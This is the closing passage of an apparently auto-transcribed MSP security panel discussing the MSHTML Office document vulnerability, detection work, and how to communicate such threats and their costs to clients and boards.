So we're, we're looking for all the artifacts that we know about and we're continued and, and as since it is something that's still evolving, you know, trying to keep on top of what's new and, and what other ways can we detect this. Yeah. And John, what about you guys? Yeah, I think this, uh, the, the news broke or maybe the chatter started around like the 17th September 17th, or excuse me, September 7th. Yeah. Uh, of this month. We aren't even at the 17th yet. Goodness, tired.

Uh, and I think for a while it was sort of absorbing and understanding what we're seeing on, on Twitter. You know, as the community and the research industry figures this out, um, it's weird kind of as, as of a vendor, right? In Huntress doing the gut check, doing the sanity check. Do we, should we really be screaming about this? Do we need to go chase this ambulance? Is this a really big thing that everyone needs to know about?

Um, and as it very rapidly became clear, uh, yeah, this is bad, people need to know. Uh, so we, we started some messaging, right? We started our, those education fronts, the blog, the Reddit post, the other things we do. Um, we've again tried to validate and recreate the proof of concept. I think similar to what Bryson's team has. Um, we kinda re brought to life, uh, the doc x the document file rendition of it, and we have some flashy videos to showcase that popping the calculator.

They're doing simple proof of concepts, but with that, we can better understand what artifacts are left behind those indicators of compromise and really validate some of the detection techniques. Um, forgive me for whatever shameless thing that we tend to do, but right. Uh, we, we have our monthly show Trade Craft Tuesday, uh, and that's getting started tomorrow.

We'll absolutely be chatting about phishing as an attack vector, and we'll certainly be getting into the nitty gritty technical details. And for folks that want to get nerdy, folks that wanna do some, uh, the geek Hackery stuff that we do, uh, we'll be doing that show again tomorrow afternoon. Um, and we'll, we'll show those proof of concepts. We'll show the cab file the INF file, all of the, the pieces of the chain here. Yeah.

And definitely pop a link to that in chat so people, if they're not already in Tradecraft Tuesday, can go check that out. Um, and Andrew, super quickly. So the reason I asked that question to both John and uh, Bryson is because if you feel like you can't keep up with this, you probably can't. Just like Gary said, that's the reality.

And so the solution is you've got, just like you outsource many other things, some of your security, not all hear me, you still own security, but some of your security you're going to have to outsource. And you're gonna have to build a relationship with that third party and say, these are some things I'm expecting you guys to do for me. Is this in scope?

And I expect you to notify, I expect you to be doing some of the threat hunting and research behind the scenes to show me relevance and even to go back and look and ensure that you're not seeing some of those signs, those indicators of compromise, so to speak. And so that's why I wanted to bring that home is so listeners could hear, even though you may not have done anything, you heard two good vendors here both talk about how much they've done behind the scenes for you.

And I love that the MSP space is finally in this point of maturity. And it's not just these two vendors. There's a whole bunch of other really solid other third parties that are out there that are likewise doing a lot of the same things. And so this is why you, you, you do have a managed relationship with security and why you have you, you need to manage it yourself, Andrew. But it's better than that.

Can I just a add on, like, uh, again, I can't help but go here, is that I, I'm listening to what you're saying, Wes, and I'm also getting to see the tools, cost and pricing for 200 MSPs every quarter, right? So I'm seeing in the real world what's going on and what you just mentioned when you talk about, you know, adding some, you know, take a soce, MDRA, huntress, a white list, all that stuff. That's, you know, you're anywhere from between 10 and $20 a seat.

And that's before when I do that, I still have at any size MSP, I still have more that I have to do, right? I have to interact with that. I have to have time to communicate with customers. So the moral of the story here is, Andrew, we can talk about all this stuff and everyone can say what they need, but what, just, what we just rattled off in some of the labor around it is probably a 50 to $60 a seat price change for most MSPs.

And that's, we're gonna have to figure out, that's why we keep going back to the communication and educating your customers so that they understand it and that won't be an issue. Well, let's come back to that. Maybe even Ryan can talk about this. 'cause you have, you're preaching it to your, the, your MSPs and then Ryan, he sells it to his board.

But the question, one of the questions, Gary, you kind of went ahead per perfect timing, was, you know, what's the best way to communicate these types of vulnerabilities to our clients? And or he didn't say prospects, but, you know, including, you know, user education, et cetera. So how are you using this as a wedge? If you could define that, Gary, and you know, again, the results your clients get.

Um, and then Ryan, love your take on this because again, you're doing, you know, uh, you're doing threat modeling and you're figuring out if there are gaps and you've gotta go sell to your board. Um, so Gary, starting with you. Yeah, so I'll focus on one piece of it. Maybe Ryan could add the, the, the, the, the second piece, so I fo I'll focus on it from a, um, sales conversation with a prospect and a business conversation like through the VCIO, with the business leaders at your customers.

So they're pretty similar and it is, um, they're not the channels for this immediate stuff. And I'll maybe let Ryan or someone else talk about how you get out to users, how you get, like stuff that they need to be aware of, like from a security standpoint. Um, but from that communication standpoint, um, we, every time something happens, it builds to the story. So we can continue to talk to customers.

Now we can rattle off just from the past three or four months, we can rattle off five or six different things and explain to them, let me tell you what's happening. I mean, almost to the point in a non-technical way, what John was talking about, which is, hey, the whole threat landscape in less than a year, the exploits, how they're done, what Ryan talked about, about how they're distributed, all of this, every customer and every prospect should understand.

'cause once they do, now, when you talk about changes you're making in roles, in process and tools, it's gonna make sense. And when you do that, the pricing objection, the only reason your customer has a price objection is because they don't understand the stuff we're talking about on here every week the same way that you do. Otherwise, they wouldn't care whether you charge them 2000 or 2,600, they wouldn't care. Yeah, excellent point, Ryan.

Yeah, maybe Ryan, like, or someone about how to get like the, like when this pops up, how to get it communicated out to points and contacts or end users kind of thing. And, and when, you know, is when, Yeah, I don't, I don't, I, I don't feel like I even have a good grasp on how easy it is to share messages like this with, with SMBs.

I think if, if you don't have a, an established vehicle and a cadence for that type of conversation, then trying to use an event like this is actually gonna cause more harm than good. Like, you need to be establishing that as a constant communication medium. And, and that's important because that's constantly reminding them of the value add that you're providing to them every single day. It shouldn't be a, I do this once or twice a year for the really bad ones.

It should be, there's almost like a, you know, our MDR provider, I get an update them a, a weekly intelligence update from them every single week. Last week I was texting Andrew about this cobalt strike, move up to the number three position in the, in the weekly threat intelligence report in terms of the most seen threats across all of their customers. And so like that, like just that piece of information is interesting, right?

So, and then this thing comes out and I'm like, Ooh, cobalt strike, cobalt strike. Putting data together, right? And so I think you need to create that, that vehicle first to have these conversations and then bringing something like this up is important. Now this is where you have to kind of straddle the business hat, the security hat and the tech hat, right?

Something like this will scare the crap out of people and it probably should, but it will take them to a place that you don't want them to go. You need to, you need to give them enough information to know that this is a serious event so that you can then educate them. And this is everything we're doing to try to keep you safe.

As more information comes out, we'll continue to act on that and we'll provide you updates And, and you said, Ryan, and here's what we do when we can't keep you safe, for no fault of either of us. Right? Right. I mean, like, right. I mean, we're all in, even me, we're all in the same boat right now. There is no mitigation. Right. But I went through, I made sure every single one of my systems is reporting into my EDR. I went to my MDR vendor and said, would you be able to detect this?

I've run proof of concepts in my environment to make sure that they actually can detect it. Like I've done all of the things that I can do to make sure that my defense, uh, that my defenses are up, right? Shields are up right now, is kind of what I'm saying. And I, you know, I can't prevent the torpedoes from coming inbound, but I know the, you know, the, the engine has enough, uh, you know, power to power the shields.

So, you know, there's, there's things you do to kind of stave off these, these attacks. Again, you, you might get someone that's popped If someone gets successfully popped by this, it's not game over. You're just now Right of boom. And we've talked about there are a lot of things you can do in right of boom, that's home field advantage, right? They're in your house now and that no one knows your house better than you. So should there's, there is a way to have these conversations.

But I would not encourage you that if you don't have a vehicle for this, I would not use this as your starting point. Ryan West, we we're on power now, captain, we can't go on much longer. I wanna add question. Oh yeah, Go ahead. Maybe talk a little bit about this in your upcoming session. 'cause again, I, I think it falls right in line with your cyber resilience be Yeah, Yeah. We should definitely add some commentary around that. Yeah.

And one of the things that I think we're really zoning in on here a little bit is, and this is one of the few things I'm actually good at, is we, in security, we have to be, especially security leaders, we have to be interpreters, right? So we're hearing the inputs of all this stuff, right? And no doubt, like John and Bryson together could walk circles and circles and circles around me and their knowledge and depth of understanding of this. That's good. I need that in my life really bad.

But what my job is to do is then if I'm in mssp, my job is to take all those inputs and learn how to translate that into outputs that your, uh, decision makers that or your clients will understand. And at Perch, we have this saying, we would always say, go get the win. Right? Like, what's the win? Uh, don't leave the win on the table. And so sometimes the win, like Bryson, you just said before the call, you got a, have a huge tropical storm coming in to to Houston, right?

Isn't it better to know that you have a tropical storm coming in and no one can stop that storm, but you can be prepared for it and you're aware of what's happening. Like that kind of confidence is much more important than having no idea that's happening. And so I think it's our job, it, there's a fine line between being this boy who cries wolf, right? Too many times to where they're fine. Like, oh, I don't care.

But I saw this at the bank, just splicing in enough commentary in your regular cadence around security with notable events will move mountains for your budget. I've shared this before on the cyber call, but I'll say it again. I, I did that over and over in my IT security committee meetings in which my president attended. And all of a sudden he inter interrupted me after six months of me having a five minute story about security. He interrupts me one day and he goes, Wes, stop.

And I'm like, uh, what's about to happen? And he goes, you know, I've always harped about asset quality forever for this bank. He goes, now I'm starting to think cybersecurity is the most important thing for us. I was like, and that's all he said. And it just, it changed everything. Uh, and so I just think that's, that's how you do it. And, and there's mechanisms to get that across.

Like one of those mechanisms would be take your VCIO role type people and make sure you're arming them with enough of the message so that when they're talking to their clients, they know what to say. I did that at the bank. I would take branch managers and it's the way I can talk to whole bank. So I take my branch managers, I teach them some very key small short snippets of things they need to know. And I'd say, go tell your people. And that, that's how we make It work.

You just said something, I wanna make sure you just said something that's awesome and I wanna make sure people don't miss it and Know that I'm good at one thing. Yeah, that was it. Yeah. No, so what you said was, remember when we're conveying this, you know, there's only a couple things we're trying to accomplish. One, in some cases we're trying to make them aware of something like this. That may be, no matter what we say, we can't completely protect them.

Um, so if there's anything they need to do or we're kind of sharing that risk, like it, we're doing it for, for, for the, for a share of risk or we're doing it to tell them that something has to change, they have to do something different. There's gonna be a price change tool. Like something only tell them was your point, what you need to in the way you need to, to get to the end result. Anything more. That's where I think you just go into unnecessary fud.

Gary, I want to, so we got basically two minutes left. I hope everybody could just hang in there. Gary, quick question to you and recommendation. 'cause I've had the good fortune to work with you for five years at one point. Um, and then I want to come to John and then to Bryson to close us out on sort of Bryson and John's gonna be around what's next? What could, you know, maybe closing comments. What should, you know, what are you guys looking for? What should MSPs be doing?

But Gary, morning huddles, can you talk about the importance and if this got into a small snippet of the cadence, maybe each day, if you have a team, I'm making it up a team of 10, right? It's somebody's job, right? To man, you know, Twitter or whatever and bring something up to have a quick conversation. But can you talk about cadence and why it's so critical? Yeah. So setting up cadence in a business, we call it a success rhythm. So, uh, every team should have a huddle, and that's daily.

You have weekly meetings monthly. If you read the book traction or you read, um, scaling up, you, you can quickly be able to implement it. But this is one of the reasons why's not just they're accountable for metrics, but we need a, like a heartbeat to be able to communicate things that are important. Somebody responsible to know what's important and somebody communicating it.

And I think what you just said, Andrew, is really how they're gonna kind of raise that security poverty level within the organization. And that's gonna go a long way besides these more formal communications that we're talking about. So, um, and with that, I, I'll just do my wrap up. Um, uh, tell Bryson and John, thank you so much.

I know we kind of rift here at the end trying to sum everything up, but we couldn't do that with all the awesome technical information that you guys brought about this. And you're doing great things for the community. Thanks. Thanks. Yeah, absolutely. John, so closing for you, like what, you know, what, what's on the maybe 60 seconds agenda for you guys, if you could kind of close us out, what are you guys looking at? What can MSPs do? Um, give us your take and then Bryson. Okay.

Uh, you know, we're, we're still keeping our ears to the ground. Uh, we're still doing the research, we're still doing the dirty work analysis. What other things might come from this sort of vulnerability? Um, I think if we were to try and glimpse into the future, and, and again, I don't have a crystal ball, not Nostradamus, I, I don't know.

But, uh, I think what this could open the door for are more tricks and more, you know, something up their, the hacker's sleeve as to how they could very well be abusing M-S-H-T-M-L. Uh, the weird risk in this is that it's, it's gonna end up being code executed from the browser, and that means it starts to bleed into that buzzword of, of file as malware. But you know, it really means it, uh, and that's traditionally much harder to detect, much harder to track down and much harder to find.

Uh, it might leave some breadcrumbs, but the onus is on us, on you, on me, on all of us to really go look for it and hunt it down. Yeah. Great way, way to sum it up. Bryson, uh, first John, thank you so much for coming, Bryson to you for closing us out.

Um, I, I think it's interesting this year we've seen that so many Microsoft vulnerabilities on what you might consider legacy software, you know, on-premise exchange, while the Microsoft seems to be more focused on cloud hosted stuff, but the on-premises stuff, it, it's, it not, maybe not exactly legacy, but it's a little bit older code base, it's not as focused for Microsoft. We've got printer drivers that have been vulnerable for, you know, 3, 4, 5 years.

Um, and, and then this, this is, you know, essentially left over from Internet Explorer. Um, I, I'd, and I think we need to start thinking about what other aspects of Windows have been around for a long time and maybe haven't been reviewed. And I think we're gonna see some more of that. Um, so I, I don't think we're done seeing these major Windows vulnerabilities and, and, uh, it's gonna be interesting to see what comes out next. Thank, thank you for sum it up, Ryan.

Wes, it sounds like the technical debt isn't just with the small, uh, vendors out there. It's the big guys too. We all have it and every industry's got it, that's for sure. Um, yeah. So with that, everybody, Ryan, uh, Wes again, Bry and John, thanks a million you guys all out there from the cyber call audience, thank you so much for joining. We'll look forward to seeing you next week. Take care. Thanks.

Related Videos